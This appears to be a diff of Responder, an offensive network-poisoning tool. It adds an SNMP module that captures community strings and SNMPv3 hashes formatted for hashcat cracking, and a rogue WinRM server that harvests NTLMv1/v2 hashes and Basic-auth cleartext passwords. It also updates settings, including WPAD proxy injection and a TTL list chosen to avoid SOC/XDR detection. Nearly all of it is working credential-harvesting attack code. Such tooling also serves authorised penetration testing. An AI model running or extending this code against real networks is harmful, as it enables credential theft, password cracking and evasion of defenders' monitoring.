+            # Check if authentication is actually being used
+            if not auth_params or auth_params == '00' * 12:
+                # Still save the username with noAuth indicator
+                SaveToDb({
+                    "module": "SNMP",
+                    "type": "SNMPv3-noAuth",
+                    "client": self.client_address[0],
+                    "user": snmp_user,
+                    "cleartext": "(noAuth)",
+                    "fullhash": snmp_user + ":(noAuth)"
+                })
+                return
+            
+            # Build hashcat-compatible hash
+            if hashcat_mode:
+                # Format for mode 25000: $SNMPv3$<type>$<boots>$<packet>$<engine_id>$<auth_params>
+                # type: 0=MD5/SHA1, 1=SHA1, 2=SHA224, etc.
+                # boots: engine boots in decimal
+                # packet: full SNMP packet in hex
+                # engine_id: engine ID in hex
+                # auth_params: authentication parameters in hex
+                
+                auth_type_map = {
+                    25000: 0,  # MD5/SHA1 combined
+                    25100: 0,  # MD5
+                    25200: 1,  # SHA1
+                    25300: 2,  # SHA224
+                    25400: 3,  # SHA256
+                    25500: 4,  # SHA384
+                    25600: 5,  # SHA512
+                }
+                auth_type = auth_type_map.get(hashcat_mode, 0)
+                
+                # Build the hash in correct format
+                hashcat_hash = "$SNMPv3$%d$%d$%s$%s$%s" % (
+                    auth_type,
+                    engine_boots,
+                    full_snmp_msg,
+                    engine_id,
+                    auth_params
+                )
+                
+                if settings.Config.Verbose:
+                    print(text('[SNMP] SNMPv3 hash captured!'))
+                    print(text('[SNMP] Crack with: hashcat -m %d hash.txt wordlist.txt' % hashcat_mode))
+                    if hashcat_mode == 25000:
+                        print(text('[SNMP] Note: Mode 25000 tries both MD5 and SHA1'))
+                        print(text('[SNMP] Or use -m 25100 (MD5 only) or -m 25200 (SHA1 only)'))
+                
+                # Sanitize type name for filesystem (remove slashes)
+                safe_type = auth_algo_name.replace('/', '-')
+                
+                SaveToDb({
+                    "module": "SNMP",
+                    "type": "SNMPv3-%s" % safe_type,
+                    "client": self.client_address[0],
+                    "user": snmp_user,
+                    "hash": hashcat_hash,
+                    "fullhash": hashcat_hash
+                })
+            else:
+                # Unknown algorithm or no auth - save basic info
+                SaveToDb({
+                    "module": "SNMP",
+                    "type": "SNMPv3",
+                    "client": self.client_address[0],
+                    "user": snmp_user,
+                    "hash": auth_params,
+                    "fullhash": "{}:{}:{}:{}".format(snmp_user, full_snmp_msg, engine_id, auth_params)
+                })
+            
+            # Send a response (Report PDU indicating authentication failure)
+            # This keeps the conversation going
+            self.send_snmpv3_report(socket)
+            
+        except Exception as e:
+            if settings.Config.Verbose:
+                print(text('[SNMP] SNMPv3 parsing error: %s' % str(e)))
+            pass
+    
+    def handle_snmpv1v2c(self, data, received_record, snmp_version, socket):
+        """Handle SNMPv1/v2c messages and extract community strings"""
+        try:
+            community_string = str(received_record['field-1'])
+            version_str = 'v1' if snmp_version == 0 else 'v2c'
+            
+            if settings.Config.Verbose:
+                print(text('[SNMP] %s Community String: %s' % (version_str, community_string)))
+            
+            # Validate community string (should be printable)
+            if not community_string or not self.is_printable(community_string):
+                return
+            
+            SaveToDb({
+                "module": "SNMP",
+                "type": "Cleartext SNMP%s" % version_str,
+                "client": self.client_address[0],
+                "user": community_string,
+                "cleartext": community_string,
+                "fullhash": community_string,
+            })
+            
+            # Send a response (could be a proper SNMP response or error)
+            # For now, we just close the connection
+            
+        except Exception as e:
+            if settings.Config.Verbose:
+                print(text('[SNMP] SNMPv1/v2c parsing error: %s' % str(e)))
+            pass
+    
+    def identify_auth_algorithm(self, data):
+        """
+        Identify the authentication algorithm used in SNMPv3
+        Returns (algorithm_name, hashcat_mode)
+        """
+        try:
+            # Look for OID patterns in the raw data
+            for oid_bytes, (algo_name, hashcat_mode) in SNMPV3_AUTH_ALGORITHMS.items():
+                if oid_bytes in data:
+                    return (algo_name, hashcat_mode)
+            
+            # If not found by OID, try to infer from auth params length
+            # MD5: 12 bytes, SHA1: 12 bytes, SHA224: 16 bytes, SHA256: 24 bytes, SHA384: 32 bytes, SHA512: 48 bytes
+            # Note: This is less reliable
+            
+            return (None, None)
+        except:
+            return (None, None)
+    
+    def is_printable(self, s):
+        """Check if string contains only printable characters"""
+        try:
+            return all(32 <= ord(c) <= 126 for c in s)
+        except:
+            return False
+    
+    def send_snmpv3_report(self, socket):
+        """
+        Send a minimal SNMPv3 Report PDU
+        This indicates authentication failure but keeps the conversation alive
+        """
+        try:
+            # Minimal Report PDU - just close for now
+            # A proper implementation would build a valid SNMP Report PDU
+            pass
+        except:
+            pass
+    
+    def send_discovery_response(self, socket, received_record):
+        """
+        Send SNMPv3 discovery response with engine ID
+        This allows the client to send authenticated request
+        """
+        try:
+            from pyasn1.type import univ
+            from pyasn1.codec.ber.encoder import encode
+            import os
+            import time
+            
+            # Generate a random engine ID (or use a fixed one)
+            # Format: 0x80 + enterprise ID (4 bytes) + format + data
+            # Enterprise ID: 0x00000000 (reserved)
+            # Format: 0x05 (octets - allows arbitrary data)
+            # Data: 12 random bytes (17 bytes total to match hashcat requirements)
+            engine_id = b'\x80\x00\x00\x00\x05' + os.urandom(12)
+            
+            # Engine boots and time
+            engine_boots = 1
+            engine_time = int(time.time()) % 2147483647
+            
+            # Build the SNMPv3 message with Report-PDU
+            # Structure: SEQUENCE { version, globalData, securityParameters, scopedPDU }
+            
+            # Global data
+            msg_id = int(received_record['field-1']['field-0'])
+            global_data = univ.Sequence()
+            global_data.setComponentByPosition(0, univ.Integer(msg_id))
+            global_data.setComponentByPosition(1, univ.Integer(65507))  # max size
+            global_data.setComponentByPosition(2, univ.OctetString(hexValue='04'))  # flags: reportable
+            global_data.setComponentByPosition(3, univ.Integer(3))  # USM
+            
+            # Security parameters (USM)
+            usm_params = univ.Sequence()
+            usm_params.setComponentByPosition(0, univ.OctetString(hexValue=engine_id.hex()))  # engine ID
+            usm_params.setComponentByPosition(1, univ.Integer(engine_boots))
+            usm_params.setComponentByPosition(2, univ.Integer(engine_time))
+            usm_params.setComponentByPosition(3, univ.OctetString(''))  # username
+            usm_params.setComponentByPosition(4, univ.OctetString(hexValue='00' * 12))  # auth params
+            usm_params.setComponentByPosition(5, univ.OctetString(''))  # priv params
+            
+            # Encode USM params
+            usm_encoded = encode(usm_params)
+            
+            from pyasn1.type import tag
+            
+            # Build Report-PDU with IMPLICIT tagging [8]
+            # The [8] tag REPLACES the SEQUENCE tag, not wraps it
+            
+            # VarBind: OID + value
+            varbind_inner = univ.Sequence()
+            varbind_inner.setComponentByPosition(0, univ.ObjectIdentifier('1.3.6.1.6.3.15.1.1.4.0'))
+            varbind_inner.setComponentByPosition(1, univ.Integer(1))
+            varbind_encoded = encode(varbind_inner)
+            
+            # VarBindList (SEQUENCE OF)
+            varbind_list_content = varbind_encoded
+            varbind_list_bytes = bytes([0x30, len(varbind_list_content)]) + varbind_list_content
+            
+            # Report-PDU content (without SEQUENCE tag, will use [8] instead)
+            report_content = b''
+            # request-id
+            report_content += encode(univ.Integer(msg_id))
+            # error-status
+            report_content += encode(univ.Integer(0))
+            # error-index  
+            report_content += encode(univ.Integer(0))
+            # variable-bindings
+            report_content += varbind_list_bytes
+            
+            # Tag as [8] IMPLICIT (replaces SEQUENCE tag)
+            report_pdu_bytes = bytes([0xa8, len(report_content)]) + report_content
+            
+            # Build scopedPDU as plain SEQUENCE (no [0] tag for plaintext)
+            # RFC 3412: plaintext msgData is just the ScopedPDU SEQUENCE
+            scoped_content = b''
+            # contextEngineID (OCTET STRING)
+            engine_bytes = bytes.fromhex(engine_id.hex())
+            scoped_content += bytes([0x04, len(engine_bytes)]) + engine_bytes
+            # contextName (OCTET STRING, empty)
+            scoped_content += bytes([0x04, 0x00])
+            # data (Report-PDU with implicit tag [8])
+            scoped_content += report_pdu_bytes
+            
+            # msgData is just a SEQUENCE containing scopedPDU (no [0] tag)
+            msg_data_bytes = bytes([0x30, len(scoped_content)]) + scoped_content
+            
+            # Use Any to include raw bytes
+            msg_data = univ.Any(hexValue=msg_data_bytes.hex())
+            
+            # Full SNMPv3 message
+            snmp_msg = univ.Sequence()
+            snmp_msg.setComponentByPosition(0, univ.Integer(3))  # version snmpv3
+            snmp_msg.setComponentByPosition(1, global_data)
+            snmp_msg.setComponentByPosition(2, univ.OctetString(usm_encoded))
+            snmp_msg.setComponentByPosition(3, msg_data)  # msgData with plaintext tag
+            
+            # Encode and send
+            response = encode(snmp_msg)
+            socket.sendto(response, self.client_address)
+            
+            if settings.Config.Verbose:
+                print(text('[SNMP] Sent discovery response with engine ID: %s' % engine_id.hex()))
+        
+        except Exception as e:
+            if settings.Config.Verbose:
+                print(text('[SNMP] Error sending discovery response: %s' % str(e)))

servers/WinRM.py

@@ -0,0 +1,184 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import struct
+import codecs
+from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler, StreamRequestHandler
+else:
+	from SocketServer import BaseRequestHandler, StreamRequestHandler
+from base64 import b64decode, b64encode
+from packets import NTLM_Challenge
+from packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans,WEBDAV_Options_Answer, WinRM_NTLM_Challenge_Ans
+from packets import WPADScript, ServeExeFile, ServeHtmlFile
+
+
+# Parse NTLMv1/v2 hash.
+def ParseHTTPHash(data, Challenge, client, module):
+	LMhashLen    = struct.unpack('<H',data[12:14])[0]
+	LMhashOffset = struct.unpack('<H',data[16:18])[0]
+	LMHash       = data[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHashFinal  = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
+	
+	NthashLen    = struct.unpack('<H',data[20:22])[0]
+	NthashOffset = struct.unpack('<H',data[24:26])[0]
+	NTHash       = data[NthashOffset:NthashOffset+NthashLen]
+	NTHashFinal  = codecs.encode(NTHash, 'hex').upper().decode('latin-1')
+	UserLen      = struct.unpack('<H',data[36:38])[0]
+	UserOffset   = struct.unpack('<H',data[40:42])[0]
+	User         = data[UserOffset:UserOffset+UserLen].decode('latin-1').replace('\x00','')
+	Challenge1    = codecs.encode(Challenge,'hex').decode('latin-1')
+	if NthashLen == 24:
+		HostNameLen     = struct.unpack('<H',data[46:48])[0]
+		HostNameOffset  = struct.unpack('<H',data[48:50])[0]
+		HostName        = data[HostNameOffset:HostNameOffset+HostNameLen].decode('latin-1').replace('\x00','')
+		WriteHash       = '%s::%s:%s:%s:%s' % (User, HostName, LMHashFinal, NTHashFinal, Challenge1)
+		SaveToDb({
+			'module': module, 
+			'type': 'NTLMv1', 
+			'client': client, 
+			'host': HostName, 
+			'user': User, 
+			'hash': LMHashFinal+':'+NTHashFinal, 
+			'fullhash': WriteHash,
+		})
+
+	if NthashLen > 24:
+		NthashLen      = 64
+		DomainLen      = struct.unpack('<H',data[28:30])[0]
+		DomainOffset   = struct.unpack('<H',data[32:34])[0]
+		Domain         = data[DomainOffset:DomainOffset+DomainLen].decode('latin-1').replace('\x00','')
+		HostNameLen    = struct.unpack('<H',data[44:46])[0]
+		HostNameOffset = struct.unpack('<H',data[48:50])[0]
+		HostName       = data[HostNameOffset:HostNameOffset+HostNameLen].decode('latin-1').replace('\x00','')
+		WriteHash      = '%s::%s:%s:%s:%s' % (User, Domain, Challenge1, NTHashFinal[:32], NTHashFinal[32:])
+		SaveToDb({
+			'module': module, 
+			'type': 'NTLMv2', 
+			'client': client, 
+			'host': HostName, 
+			'user': Domain + '\\' + User,
+			'hash': NTHashFinal[:32] + ':' + NTHashFinal[32:],
+			'fullhash': WriteHash,
+		})
+
+# Handle HTTP packet sequence.
+def PacketSequence(data, client, Challenge):
+	NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+	NTLM_Auth2 = re.findall(r'(?<=Authorization: Negotiate )[^\r]*', data)
+	Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)
+
+	if NTLM_Auth or NTLM_Auth2:
+		if NTLM_Auth2:
+			Packet_NTLM = b64decode(''.join(NTLM_Auth2))[8:9]
+		if NTLM_Auth:
+			Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
+
+		if Packet_NTLM == b'\x01':
+			Buffer = NTLM_Challenge(NegoFlags="\x35\x82\x89\xe2", ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+			Buffer.calculate()
+			if NTLM_Auth2:
+				Buffer_Ans = WinRM_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
+				return Buffer_Ans
+			else:
+				Buffer_Ans = IIS_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
+				return Buffer_Ans
+
+		if Packet_NTLM == b'\x03':
+			if NTLM_Auth2:
+				NTLM_Auth = b64decode(''.join(NTLM_Auth2))
+			else:
+				NTLM_Auth = b64decode(''.join(NTLM_Auth))
+
+			ParseHTTPHash(NTLM_Auth, Challenge, client, "WinRM")
+			Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
+			Buffer.calculate()
+			return Buffer
+
+	elif Basic_Auth:
+		ClearText_Auth = b64decode(''.join(Basic_Auth))
+
+		SaveToDb({
+			'module': 'WinRM', 
+			'type': 'Basic', 
+			'client': client, 
+			'user': ClearText_Auth.decode('latin-1').split(':')[0], 
+			'cleartext': ClearText_Auth.decode('latin-1').split(':')[1], 
+			})
+
+		Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
+		Buffer.calculate()
+		return Buffer
+	else:
+		if settings.Config.Basic:
+			r = IIS_Basic_401_Ans()
+			r.calculate()
+			Response = r
+			if settings.Config.Verbose:
+				print(text("[WinRM] Sending BASIC authentication request to %s" % client.replace("::ffff:","")))
+
+		else:
+			r = IIS_Auth_401_Ans()
+			r.calculate()
+			Response = r
+			if settings.Config.Verbose:
+				print(text("[WinRM] Sending NTLM authentication request to %s" % client.replace("::ffff:","")))
+
+		return Response
+
+# HTTP Server class
+class WinRM(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			Challenge = RandomChallenge()
+			while True:
+				self.request.settimeout(3)
+				remaining = 10*1024*1024 #setting max recieve size
+				data = ''
+				while True:
+					buff = ''
+					buff = NetworkRecvBufferPython2or3(self.request.recv(8092))
+					if buff == '':
+						break
+					data += buff
+					remaining -= len(buff)
+					#check if we recieved the full header
+					if data.find('\r\n\r\n') != -1: 
+						#we did, now to check if there was anything else in the request besides the header
+						if data.find('Content-Length') == -1:
+							#request contains only header
+							break
+						else:
+							#searching for that content-length field in the header
+							for line in data.split('\r\n'):
+								if line.find('Content-Length') != -1:
+									line = line.strip()
+									remaining = int(line.split(':')[1].strip()) - len(data)
+					if remaining <= 0:
+						break
+				if data == "":
+					break
+
+				else:
+					Buffer = PacketSequence(data,self.client_address[0], Challenge)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
+		
+		except:
+			self.request.close()
+			pass
+			

settings.py

@@ -14,13 +14,16 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import utils
-import ConfigParser
+import utils, sys, random
+if (sys.version_info > (3, 0)):
+	import configparser as ConfigParser
+else:
+	import ConfigParser
 import subprocess
 
 from utils import *
 
-__version__ = 'Responder 2.3.2'
+__version__ = 'Responder 3.2.2.0'
 
 class Settings:
 	
@@ -39,25 +42,56 @@ class Settings:
 		return str.upper() == 'ON'
 
 	def ExpandIPRanges(self):
-		def expand_ranges(lst):
+		def expand_ranges(lst):	
 			ret = []
 			for l in lst:
-				tab = l.split('.')
-				x = {}
-				i = 0
-				for byte in tab:
-					if '-' not in byte:
-						x[i] = x[i+1] = int(byte)
-					else:
-						b = byte.split('-')
-						x[i] = int(b[0])
-						x[i+1] = int(b[1])
-					i += 2
-				for a in range(x[0], x[1]+1):
-					for b in range(x[2], x[3]+1):
-						for c in range(x[4], x[5]+1):
-							for d in range(x[6], x[7]+1):
-								ret.append('%d.%d.%d.%d' % (a, b, c, d))
+				if ':' in l: #For IPv6 addresses, similar to the IPv4 version below but hex and pads :'s to expand shortend addresses 
+					while l.count(':') < 7: 
+						pos = l.find('::')
+						l = l[:pos] + ':' + l[pos:]
+					tab = l.split(':')
+					x = {}
+					i = 0
+					xaddr = ''
+					for byte in tab:
+						if byte == '':
+							byte = '0'
+						if '-' not in byte:
+							x[i] = x[i+1] = int(byte, base=16)
+						else:
+							b = byte.split('-')
+							x[i] = int(b[0], base=16)
+							x[i+1] = int(b[1], base=16)
+						i += 2
+					for a in range(x[0], x[1]+1):
+						for b in range(x[2], x[3]+1):
+							for c in range(x[4], x[5]+1):
+								for d in range(x[6], x[7]+1):
+									for e in range(x[8], x[9]+1):
+										for f in range(x[10], x[11]+1):
+											for g in range(x[12], x[13]+1):
+												for h in range(x[14], x[15]+1):
+													xaddr = ('%x:%x:%x:%x:%x:%x:%x:%x' % (a, b, c, d, e, f, g, h))
+													xaddr = re.sub('(^|:)0{1,4}', ':', xaddr, count = 7)#Compresses expanded IPv6 address
+													xaddr = re.sub(':{3,7}', '::', xaddr, count = 7)
+													ret.append(xaddr)
+				else:				
+					tab = l.split('.')
+					x = {}
+					i = 0
+					for byte in tab:
+						if '-' not in byte:
+							x[i] = x[i+1] = int(byte)
+						else:
+							b = byte.split('-')
+							x[i] = int(b[0])
+							x[i+1] = int(b[1])
+						i += 2
+					for a in range(x[0], x[1]+1):
+						for b in range(x[2], x[3]+1):
+							for c in range(x[4], x[5]+1):
+								for d in range(x[6], x[7]+1):
+									ret.append('%d.%d.%d.%d' % (a, b, c, d))
 			return ret
 
 		self.RespondTo = expand_ranges(self.RespondTo)
@@ -65,26 +99,47 @@ class Settings:
 
 	def populate(self, options):
 
-		if options.Interface is None and utils.IsOsX() is False:
-			print utils.color("Error: -I <if> mandatory option is missing", 1)
+		if options.Interface == None and utils.IsOsX() == False:
+			print(utils.color("Error: -I <if> mandatory option is missing", 1))
 			sys.exit(-1)
 
+		if options.Interface == "ALL" and options.OURIP == None:
+			print(utils.color("Error: -i is missing.\nWhen using -I ALL you need to provide your current ip address", 1))
+			sys.exit(-1)
+		#Python version
+		if (sys.version_info > (3, 0)):
+			self.PY2OR3     = "PY3"
+		else:
+			self.PY2OR3	= "PY2"
 		# Config parsing
 		config = ConfigParser.ConfigParser()
 		config.read(os.path.join(self.ResponderPATH, 'Responder.conf'))
 
-		# Servers
+        # Poisoners
+		self.LLMNR_On_Off    = self.toBool(config.get('Responder Core', 'LLMNR'))
+		self.NBTNS_On_Off    = self.toBool(config.get('Responder Core', 'NBTNS'))
+		self.MDNS_On_Off     = self.toBool(config.get('Responder Core', 'MDNS'))
+		self.DHCPv6_On_Off   = self.toBool(config.get('Responder Core', 'DHCPv6'))
+
+        # Servers
 		self.HTTP_On_Off     = self.toBool(config.get('Responder Core', 'HTTP'))
 		self.SSL_On_Off      = self.toBool(config.get('Responder Core', 'HTTPS'))
 		self.SMB_On_Off      = self.toBool(config.get('Responder Core', 'SMB'))
+		self.QUIC_On_Off     = self.toBool(config.get('Responder Core', 'QUIC'))
 		self.SQL_On_Off      = self.toBool(config.get('Responder Core', 'SQL'))
+		self.MYSQL_On_Off    = self.toBool(config.get('Responder Core', 'MYSQL'))
 		self.FTP_On_Off      = self.toBool(config.get('Responder Core', 'FTP'))
 		self.POP_On_Off      = self.toBool(config.get('Responder Core', 'POP'))
 		self.IMAP_On_Off     = self.toBool(config.get('Responder Core', 'IMAP'))
 		self.SMTP_On_Off     = self.toBool(config.get('Responder Core', 'SMTP'))
 		self.LDAP_On_Off     = self.toBool(config.get('Responder Core', 'LDAP'))
+		self.MQTT_On_Off     = self.toBool(config.get('Responder Core', 'MQTT'))
 		self.DNS_On_Off      = self.toBool(config.get('Responder Core', 'DNS'))
+		self.RDP_On_Off      = self.toBool(config.get('Responder Core', 'RDP'))
+		self.DCERPC_On_Off   = self.toBool(config.get('Responder Core', 'DCERPC'))
+		self.WinRM_On_Off    = self.toBool(config.get('Responder Core', 'WINRM'))
 		self.Krb_On_Off      = self.toBool(config.get('Responder Core', 'Kerberos'))
+		self.SNMP_On_Off     = self.toBool(config.get('Responder Core', 'SNMP'))
 
 		# Db File
 		self.DatabaseFile    = os.path.join(self.ResponderPATH, config.get('Responder Core', 'Database'))
@@ -100,14 +155,106 @@ class Settings:
 		self.AnalyzeLogFile      = os.path.join(self.LogDir, config.get('Responder Core', 'AnalyzeLog'))
 		self.ResponderConfigDump = os.path.join(self.LogDir, config.get('Responder Core', 'ResponderConfigDump'))
 
+		# CLI options
+		self.ExternalIP         = options.ExternalIP
+		self.LM_On_Off          = options.LM_On_Off
+		self.NOESS_On_Off       = options.NOESS_On_Off
+		self.WPAD_On_Off        = options.WPAD_On_Off
+		self.DHCP_On_Off        = options.DHCP_On_Off
+		self.DHCPv6_On_Off      = options.DHCPv6_On_Off
+		self.Basic              = options.Basic
+		self.Interface          = options.Interface
+		self.OURIP              = options.OURIP
+		self.Force_WPAD_Auth    = options.Force_WPAD_Auth
+		self.Upstream_Proxy     = options.Upstream_Proxy
+		self.AnalyzeMode        = options.Analyze
+		self.Verbose            = options.Verbose
+		self.ProxyAuth_On_Off   = options.ProxyAuth_On_Off
+		self.CommandLine        = str(sys.argv)
+		self.Bind_To            = utils.FindLocalIP(self.Interface, self.OURIP)
+		self.Bind_To6           = utils.FindLocalIP6(self.Interface, self.OURIP)
+		self.DHCP_DNS           = options.DHCP_DNS
+		self.ExternalIP6        = options.ExternalIP6
+		self.Quiet_Mode			= options.Quiet
+		self.AnswerName			= options.AnswerName
+		self.ErrorCode          = options.ErrorCode
+		self.RDNSS_On_Off = options.RDNSS_On_Off
+		self.DNSSL_Domain = options.DNSSL_Domain
+
+		# TTL blacklist. Known to be detected by SOC / XDR
+		TTL_blacklist = [b"\x00\x00\x00\x1e", b"\x00\x00\x00\x78", b"\x00\x00\x00\xa5"]
+		# Lets add a default mode, which uses Windows default TTL for each protocols (set respectively in packets.py)
+		if options.TTL is None:
+			self.TTL = None
+			
+		# Random TTL
+		elif options.TTL.upper() == "RANDOM":
+			TTL = bytes.fromhex("000000"+format(random.randint(10,90),'x'))
+			if TTL in TTL_blacklist:
+				TTL = int.from_bytes(TTL, "big")+1
+				TTL = int.to_bytes(TTL, 4)
+			self.TTL = TTL.decode('utf-8')
+		else:
+			self.TTL = bytes.fromhex("000000"+options.TTL).decode('utf-8')
+
+		#Do we have IPv6 for real?
+		self.IPv6 = utils.Probe_IPv6_socket()
+			
+		if self.Interface == "ALL":
+			self.Bind_To_ALL  = True
+		else:
+			self.Bind_To_ALL  = False
+		#IPV4
+		if self.Interface == "ALL":
+			self.IP_aton   = socket.inet_aton(self.OURIP)
+		else:
+			self.IP_aton   = socket.inet_aton(self.Bind_To)
+		#IPV6
+		if self.Interface == "ALL":
+			if self.OURIP != None and utils.IsIPv6IP(self.OURIP):
+				self.IP_Pton6   = socket.inet_pton(socket.AF_INET6, self.OURIP)
+		else:
+			self.IP_Pton6   = socket.inet_pton(socket.AF_INET6, self.Bind_To6)
+		
+		#External IP
+		if self.ExternalIP:
+			if utils.IsIPv6IP(self.ExternalIP):
+				sys.exit(utils.color('[!] IPv6 address provided with -e parameter. Use -6 IPv6_address instead.', 1))
+
+			self.ExternalIPAton = socket.inet_aton(self.ExternalIP)
+			self.ExternalResponderIP = utils.RespondWithIP()
+		else:
+			self.ExternalResponderIP = self.Bind_To
+			
+		#External IPv6
+		if self.ExternalIP6:
+			self.ExternalIP6Pton = socket.inet_pton(socket.AF_INET6, self.ExternalIP6)
+			self.ExternalResponderIP6 = utils.RespondWithIP6()
+		else:
+			self.ExternalResponderIP6 = self.Bind_To6
+
+		# Kerberos operation mode: CAPTURE (AS-REP hashes) or FORCE_NTLM (force fallback)
+		try:
+			self.KerberosMode = config.get('Kerberos', 'KerberosMode').strip()
+			if self.KerberosMode not in ['CAPTURE', 'FORCE_NTLM']:
+				print('[Config] Invalid KerberosMode: %s, defaulting to CAPTURE' % self.KerberosMode)
+				self.KerberosMode = 'CAPTURE'
+		except:
+			# Default to CAPTURE mode if not specified (backward compatible)
+			self.KerberosMode = 'CAPTURE'
+        
+		self.Os_version      = sys.platform
+
 		self.FTPLog          = os.path.join(self.LogDir, 'FTP-Clear-Text-Password-%s.txt')
 		self.IMAPLog         = os.path.join(self.LogDir, 'IMAP-Clear-Text-Password-%s.txt')
 		self.POP3Log         = os.path.join(self.LogDir, 'POP3-Clear-Text-Password-%s.txt')
 		self.HTTPBasicLog    = os.path.join(self.LogDir, 'HTTP-Clear-Text-Password-%s.txt')
 		self.LDAPClearLog    = os.path.join(self.LogDir, 'LDAP-Clear-Text-Password-%s.txt')
+		self.MQTTLog	     = os.path.join(self.LogDir, 'MQTT-Clear-Text-Password-%s.txt')
 		self.SMBClearLog     = os.path.join(self.LogDir, 'SMB-Clear-Text-Password-%s.txt')
 		self.SMTPClearLog    = os.path.join(self.LogDir, 'SMTP-Clear-Text-Password-%s.txt')
 		self.MSSQLClearLog   = os.path.join(self.LogDir, 'MSSQL-Clear-Text-Password-%s.txt')
+		self.SNMPLog         = os.path.join(self.LogDir, 'SNMP-Clear-Text-Password-%s.txt')
 
 		self.LDAPNTLMv1Log   = os.path.join(self.LogDir, 'LDAP-NTLMv1-Client-%s.txt')
 		self.HTTPNTLMv1Log   = os.path.join(self.LogDir, 'HTTP-NTLMv1-Client-%s.txt')
@@ -130,91 +277,137 @@ class Settings:
 		self.WPAD_Script      = config.get('HTTP Server', 'WPADScript')
 		self.HtmlToInject     = config.get('HTTP Server', 'HtmlToInject')
 
-		if not os.path.exists(self.Html_Filename):
-			print utils.color("/!\ Warning: %s: file not found" % self.Html_Filename, 3, 1)
+		if len(self.HtmlToInject) == 0:
+			self.HtmlToInject = ""# Let users set it up themself in Responder.conf. "<img src='file://///"+self.Bind_To+"/pictures/logo.jpg' alt='Loading' height='1' width='1'>"
 
-		if not os.path.exists(self.Exe_Filename):
-			print utils.color("/!\ Warning: %s: file not found" % self.Exe_Filename, 3, 1)
+		if len(self.WPAD_Script) == 0:
+			if self.WPAD_On_Off:
+				self.WPAD_Script = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; return "PROXY '+self.Bind_To+':3128; DIRECT";}'
+				
+			if self.ProxyAuth_On_Off:
+				self.WPAD_Script = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; return "PROXY '+self.Bind_To+':3128; DIRECT";}'
+
+		if self.Serve_Exe == True:	
+			if not os.path.exists(self.Html_Filename):
+				print(utils.color("/!\\ Warning: %s: file not found" % self.Html_Filename, 3, 1))
+
+			if not os.path.exists(self.Exe_Filename):
+				print(utils.color("/!\\ Warning: %s: file not found" % self.Exe_Filename, 3, 1))
+
+		# DHCPv6 Server Options
+		try:
+			self.DHCPv6_Domain = config.get('DHCPv6 Server', 'DHCPv6_Domain')
+			self.DHCPv6_SendRA = self.toBool(config.get('DHCPv6 Server', 'SendRA'))
+			self.Bind_To_IPv6 = config.get('DHCPv6 Server', 'BindToIPv6')
+		except:
+		# Defaults if section doesn't exist
+			self.DHCPv6_Domain = ''
+			self.DHCPv6_SendRA = False
+			self.Bind_To_IPv6 = ''
 
 		# SSL Options
 		self.SSLKey  = config.get('HTTPS Server', 'SSLKey')
 		self.SSLCert = config.get('HTTPS Server', 'SSLCert')
 
 		# Respond to hosts
-		self.RespondTo         = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')])
-		self.RespondToName     = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondToName').strip().split(',')])
-		self.DontRespondTo     = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')])
-		self.DontRespondToName = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')])
-
+		self.RespondTo         = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')]))
+		self.RespondToName     = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondToName').strip().split(',')]))
+		self.DontRespondTo     = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')]))
+		self.DontRespondToTLD  = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToTLD').strip().split(',')]))
+		self.DontRespondToName_= list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')]))
+		#add a .local to all provided DontRespondToName
+		self.MDNSTLD           = ['.LOCAL']
+		self.DontRespondToName = [x+y for x in self.DontRespondToName_ for y in ['']+self.MDNSTLD]
+		#Generate Random stuff for one Responder session
+		self.MachineName       = 'WIN-'+''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(11)])
+		self.Username            = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])
+		self.Domain            = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(4)])
+		self.DHCPHostname      = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(9)])
